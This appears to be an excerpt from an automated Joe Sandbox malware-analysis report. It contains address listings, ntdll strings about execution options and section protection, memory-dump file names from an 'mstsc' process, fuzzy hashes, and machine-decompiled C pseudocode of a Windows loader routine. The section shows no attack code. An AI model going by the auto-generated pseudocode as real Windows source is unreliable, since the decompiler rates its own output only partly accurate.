                                                                                                                                                                                      0x04617583
                                                                                                                                                                                      0x0461758f
                                                                                                                                                                                      0x04654443
                                                                                                                                                                                      0x04617595
                                                                                                                                                                                      0x0461759e
                                                                                                                                                                                      0x0461759e
                                                                                                                                                                                      0x046175a2
                                                                                                                                                                                      0x046175bc
                                                                                                                                                                                      0x046175c2
                                                                                                                                                                                      0x046175c7
                                                                                                                                                                                      0x046175c9
                                                                                                                                                                                      0x04617621
                                                                                                                                                                                      0x04617623
                                                                                                                                                                                      0x04617624
                                                                                                                                                                                      0x046175f8
                                                                                                                                                                                      0x046175ff
                                                                                                                                                                                      0x04617601
                                                                                                                                                                                      0x0461762c
                                                                                                                                                                                      0x04617603
                                                                                                                                                                                      0x04617609
                                                                                                                                                                                      0x04617610
                                                                                                                                                                                      0x04617612
                                                                                                                                                                                      0x04617612
                                                                                                                                                                                      0x04617612
                                                                                                                                                                                      0x04617614
                                                                                                                                                                                      0x04617616
                                                                                                                                                                                      0x04617630
                                                                                                                                                                                      0x04617633
                                                                                                                                                                                      0x04617633
                                                                                                                                                                                      0x04617618
                                                                                                                                                                                      0x0461761a
                                                                                                                                                                                      0x046545c9
                                                                                                                                                                                      0x046545c9
                                                                                                                                                                                      0x046545d1
                                                                                                                                                                                      0x046545d2
                                                                                                                                                                                      0x046545d4
                                                                                                                                                                                      0x046545d6
                                                                                                                                                                                      0x046545d6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0461761a
                                                                                                                                                                                      0x046175ce
                                                                                                                                                                                      0x046175d4
                                                                                                                                                                                      0x046175da
                                                                                                                                                                                      0x046175df
                                                                                                                                                                                      0x046175e1
                                                                                                                                                                                      0x0465444a
                                                                                                                                                                                      0x04654450
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x04654456
                                                                                                                                                                                      0x04654469
                                                                                                                                                                                      0x04654476
                                                                                                                                                                                      0x04654486
                                                                                                                                                                                      0x0465448b
                                                                                                                                                                                      0x04654497
                                                                                                                                                                                      0x046544b9
                                                                                                                                                                                      0x046544bf
                                                                                                                                                                                      0x046544c1
                                                                                                                                                                                      0x046544c3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046544c9
                                                                                                                                                                                      0x046544cf
                                                                                                                                                                                      0x046544d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046544dc
                                                                                                                                                                                      0x046544de
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046544e6
                                                                                                                                                                                      0x046544ed
                                                                                                                                                                                      0x046544ef
                                                                                                                                                                                      0x046545c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046545c4
                                                                                                                                                                                      0x046544f7
                                                                                                                                                                                      0x046544f8
                                                                                                                                                                                      0x04654510
                                                                                                                                                                                      0x04654515
                                                                                                                                                                                      0x04654524
                                                                                                                                                                                      0x0465452b
                                                                                                                                                                                      0x0465452c
                                                                                                                                                                                      0x0465452e
                                                                                                                                                                                      0x04654556
                                                                                                                                                                                      0x04654561
                                                                                                                                                                                      0x04654567
                                                                                                                                                                                      0x04654569
                                                                                                                                                                                      0x0465456c
                                                                                                                                                                                      0x0465456e
                                                                                                                                                                                      0x04654574
                                                                                                                                                                                      0x04654576
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0465457c
                                                                                                                                                                                      0x0465457c
                                                                                                                                                                                      0x04654584
                                                                                                                                                                                      0x04654588
                                                                                                                                                                                      0x0465458a
                                                                                                                                                                                      0x0465458c
                                                                                                                                                                                      0x0465458e
                                                                                                                                                                                      0x0465458e
                                                                                                                                                                                      0x0465459b
                                                                                                                                                                                      0x046545a0
                                                                                                                                                                                      0x046545a7
                                                                                                                                                                                      0x046545ac
                                                                                                                                                                                      0x046545ae
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046545b4
                                                                                                                                                                                      0x046545b4
                                                                                                                                                                                      0x046545b7
                                                                                                                                                                                      0x046545b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046545bf
                                                                                                                                                                                      0x04654530
                                                                                                                                                                                      0x04654535
                                                                                                                                                                                      0x04654537
                                                                                                                                                                                      0x04654539
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0465453e
                                                                                                                                                                                      0x046175e7
                                                                                                                                                                                      0x046175e9
                                                                                                                                                                                      0x046175ee
                                                                                                                                                                                      0x046175f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046175f2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046175a4
                                                                                                                                                                                      0x046175a4
                                                                                                                                                                                      0x046175a4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046175a4

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04654530
                                                                                                                                                                                      • Execute=1, xrefs: 0465451E
                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04654507
                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04654460
                                                                                                                                                                                      • ExecuteOptions, xrefs: 046544AB
                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04654592
                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0465454D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                                                      • Opcode ID: be57c5ff6025dca580177735d6c9e9ca4900eafc9cbdb84d0d1cd50897a0fe08
                                                                                                                                                                                      • Instruction ID: 96f18125a01d52826358ddb54ee5b6a6ecccad07f994af3b1e0953a0f9d36567
                                                                                                                                                                                      • Opcode Fuzzy Hash: be57c5ff6025dca580177735d6c9e9ca4900eafc9cbdb84d0d1cd50897a0fe08
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C51E871B002197AEB10AEA5DC95FA973A8EF14305F0804EDD506A72A1FE70BE45DE64
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                                                      			E045E9046(void* __ebx, signed char* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                      				short _t95;
                                                                                                                                                                                      				intOrPtr _t110;
                                                                                                                                                                                      				short _t118;
                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                      				intOrPtr _t136;
                                                                                                                                                                                      				intOrPtr _t140;
                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                      				intOrPtr* _t148;
                                                                                                                                                                                      				signed char* _t151;
                                                                                                                                                                                      				intOrPtr _t152;
                                                                                                                                                                                      				intOrPtr* _t154;
                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t141 = __edx;
                                                                                                                                                                                      				_push(0x154);
                                                                                                                                                                                      				_push(0x46bbe98);
                                                                                                                                                                                      				E04637C40(__ebx, __edi, __esi);
                                                                                                                                                                                      				 *(_t156 - 0xf0) = __edx;
                                                                                                                                                                                      				_t151 = __ecx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
                                                                                                                                                                                      				 *((short*)(_t156 - 0xda)) = 0;
                                                                                                                                                                                      				 *(_t156 - 0xe0) = 0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
                                                                                                                                                                                      				E04628F40(_t156 - 0x13c, 0, 0x3c);
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
                                                                                                                                                                                      				 *((intOrPtr*)(_t156 - 0x160)) = 1;
                                                                                                                                                                                      				_t131 = 7;
                                                                                                                                                                                      				memset(_t156 - 0x15c, 0, _t131 << 2);
                                                                                                                                                                                      				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
                                                                                                                                                                                      				_t152 = E045F9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                                      				if(_t152 >= 0) {
                                                                                                                                                                                      					if( *0x46d65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t152 = E045FA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
                                                                                                                                                                                      						if(_t152 < 0) {
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
                                                                                                                                                                                      							L11:
                                                                                                                                                                                      							_t152 = 0xc0150005;
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
                                                                                                                                                                                      							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
                                                                                                                                                                                      								 *(_t156 - 0x120) = 0xfffffffc;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t136 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                                      						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
                                                                                                                                                                                      						 *((short*)(_t156 - 0xda)) = _t95;
                                                                                                                                                                                      						 *((short*)(_t156 - 0xdc)) = _t95;
                                                                                                                                                                                      						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                                      						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
                                                                                                                                                                                      						 *((short*)(_t156 - 0xea)) = 0xaa;
                                                                                                                                                                                      						_t152 = E04605A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
                                                                                                                                                                                      						if(_t152 < 0 || E046004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                                      							goto L1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t154 =  *0x46d65e0; // 0x7728a680
                                                                                                                                                                                      							 *0x46d91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
                                                                                                                                                                                      							_t152 =  *_t154();
                                                                                                                                                                                      							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      							if(_t152 < 0) {
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
                                                                                                                                                                                      								if(_t110 == 0xffffffff) {
                                                                                                                                                                                      									L26:
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 4)) = 1;
                                                                                                                                                                                      									_t148 =  *0x46d65e8;
                                                                                                                                                                                      									if(_t148 != 0) {
                                                                                                                                                                                      										 *0x46d91e0(_t110);
                                                                                                                                                                                      										 *_t148();
                                                                                                                                                                                      									}
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                                      									goto L1;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E045FDC40(_t156 - 0x164, _t110);
                                                                                                                                                                                      								 *((intOrPtr*)(_t156 - 4)) = 0;
                                                                                                                                                                                      								if( *((intOrPtr*)(_t146 + 4)) != 0) {
                                                                                                                                                                                      									E045F3B90(_t146);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
                                                                                                                                                                                      								_t152 = E045F9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                                      								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      								if(_t152 < 0) {
                                                                                                                                                                                      									L25:
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                                      									_t110 = E0464247B();
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t152 = E045FA170(7, 0, 2, _t149, _t156 - 0x140);
                                                                                                                                                                                      									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      									if(_t152 < 0) {
                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
                                                                                                                                                                                      										_t140 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                                      										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
                                                                                                                                                                                      										 *((short*)(_t156 - 0xda)) = _t118;
                                                                                                                                                                                      										 *((short*)(_t156 - 0xdc)) = _t118;
                                                                                                                                                                                      										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                                      										if(E046004C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                                      											goto L25;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t152 = 0xc0150004;
                                                                                                                                                                                      										L24:
                                                                                                                                                                                      										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t152 = 0xc0150005;
                                                                                                                                                                                      									goto L24;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L1:
                                                                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
                                                                                                                                                                                      				return _t152;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x045e9046
                                                                                                                                                                                      0x045e9046
                                                                                                                                                                                      0x045e904b
                                                                                                                                                                                      0x045e9050
                                                                                                                                                                                      0x045e9055
                                                                                                                                                                                      0x045e905b
                                                                                                                                                                                      0x045e905d
                                                                                                                                                                                      0x045e9066
                                                                                                                                                                                      0x045e906f
                                                                                                                                                                                      0x045e9078
                                                                                                                                                                                      0x045e9080
                                                                                                                                                                                      0x045e9088
                                                                                                                                                                                      0x045e908f
                                                                                                                                                                                      0x045e9095
                                                                                                                                                                                      0x045e90a9
                                                                                                                                                                                      0x045e90b1
                                                                                                                                                                                      0x045e90be
                                                                                                                                                                                      0x045e90c6
                                                                                                                                                                                      0x045e90cf
                                                                                                                                                                                      0x045e90e2
                                                                                                                                                                                      0x045e90f7
                                                                                                                                                                                      0x045e90fb
                                                                                                                                                                                      0x045e9118
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x045e9123
                                                                                                                                                                                      0x045e913b
                                                                                                                                                                                      0x045e913f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x045e9147
                                                                                                                                                                                      0x0464231f
                                                                                                                                                                                      0x0464231f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0464231f
                                                                                                                                                                                      0x045e9154
                                                                                                                                                                                      0x04642330
                                                                                                                                                                                      0x04642336
                                                                                                                                                                                      0x04642336
                                                                                                                                                                                      0x045e915a
                                                                                                                                                                                      0x045e915a
                                                                                                                                                                                      0x045e915a
                                                                                                                                                                                      0x045e9161
                                                                                                                                                                                      0x045e9167
                                                                                                                                                                                      0x045e916b
                                                                                                                                                                                      0x045e9172
                                                                                                                                                                                      0x045e9182
                                                                                                                                                                                      0x045e918e
                                                                                                                                                                                      0x045e9199
                                                                                                                                                                                      0x045e91ba
                                                                                                                                                                                      0x045e91be
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x045e91e0
                                                                                                                                                                                      0x04642358
                                                                                                                                                                                      0x04642360
                                                                                                                                                                                      0x04642368
                                                                                                                                                                                      0x0464236a
                                                                                                                                                                                      0x04642372
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x04642378
                                                                                                                                                                                      0x04642378
                                                                                                                                                                                      0x04642381
                                                                                                                                                                                      0x04642458
                                                                                                                                                                                      0x04642458
                                                                                                                                                                                      0x0464245b
                                                                                                                                                                                      0x04642463
                                                                                                                                                                                      0x04642468
                                                                                                                                                                                      0x0464246e
                                                                                                                                                                                      0x0464246e
                                                                                                                                                                                      0x046424a7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046424a7
                                                                                                                                                                                      0x0464238f
                                                                                                                                                                                      0x04642396
                                                                                                                                                                                      0x0464239c
                                                                                                                                                                                      0x0464239f
                                                                                                                                                                                      0x0464239f
                                                                                                                                                                                      0x046423bb
                                                                                                                                                                                      0x046423c8
                                                                                                                                                                                      0x046423ca
                                                                                                                                                                                      0x046423d2
                                                                                                                                                                                      0x0464244c
                                                                                                                                                                                      0x0464244c
                                                                                                                                                                                      0x04642453
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046423d4
                                                                                                                                                                                      0x046423e7
                                                                                                                                                                                      0x046423e9
                                                                                                                                                                                      0x046423f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046423f9
                                                                                                                                                                                      0x04642402
                                                                                                                                                                                      0x04642408
                                                                                                                                                                                      0x0464240c
                                                                                                                                                                                      0x04642413
                                                                                                                                                                                      0x04642423
                                                                                                                                                                                      0x0464243f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x04642441
                                                                                                                                                                                      0x04642446
                                                                                                                                                                                      0x04642446
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x04642446
                                                                                                                                                                                      0x046423fb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x046423fb
                                                                                                                                                                                      0x046423d2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x04642372
                                                                                                                                                                                      0x045e91be
                                                                                                                                                                                      0x045e9118
                                                                                                                                                                                      0x045e90fd
                                                                                                                                                                                      0x045e9102
                                                                                                                                                                                      0x045e910e

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: $$@
                                                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                                                      • Opcode ID: 863b7a2984106ee54819560b9e021d52200b518beb56463b1dfe5208e72605f0
                                                                                                                                                                                      • Instruction ID: 47c507e63dcf51cb2699eed90dc546f456e0570592f311662cb7c12a2ef66ed7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 863b7a2984106ee54819560b9e021d52200b518beb56463b1dfe5208e72605f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: C5813BB1D002699BDB35CF54CC44BEEB7B8BB48754F1045EAEA09B7240E7306E859FA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%